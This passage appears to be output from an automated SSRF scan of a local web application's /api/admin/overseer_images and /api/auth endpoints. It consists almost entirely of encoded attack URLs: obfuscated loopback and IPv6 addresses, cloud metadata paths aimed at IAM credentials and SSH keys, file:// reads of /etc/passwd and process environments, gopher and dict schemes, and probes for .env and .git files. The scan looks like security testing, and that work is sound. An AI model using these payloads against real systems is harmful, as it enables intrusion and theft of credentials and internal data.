`http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.1.3` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=7F000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=2130706433` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=6425673729` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127_0._0_1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localtest.me` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.127.127.127` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=017700000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=2852039166` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=7147006462` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.0` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235521` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235777` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=425.510.425.510` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=instance-data` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=2130706433%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235521%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235777%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/auth +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/auth?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/auth?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/auth?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/auth?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/auth?url=127.1%3A80` +- Testing: `http://localhost:4200/api/auth?url=0` +- Testing: `http://localhost:4200/api/auth?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A80` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/auth?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/auth?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/auth?url=127.127.127.127` +- Testing: `http://localhost:4200/api/auth?url=127.0.1.3` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.0` +- Testing: `http://localhost:4200/api/auth?url=2130706433` +- Testing: `http://localhost:4200/api/auth?url=017700000001` +- Testing: `http://localhost:4200/api/auth?url=0x7f000001` +- Testing: `http://localhost:4200/api/auth?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/auth?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/auth?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/auth?url=google.com.localhost` +- Testing: `http://localhost:4200/api/auth?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=localtest.me` +- Testing: `http://localhost:4200/api/auth?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/auth?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/auth?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: 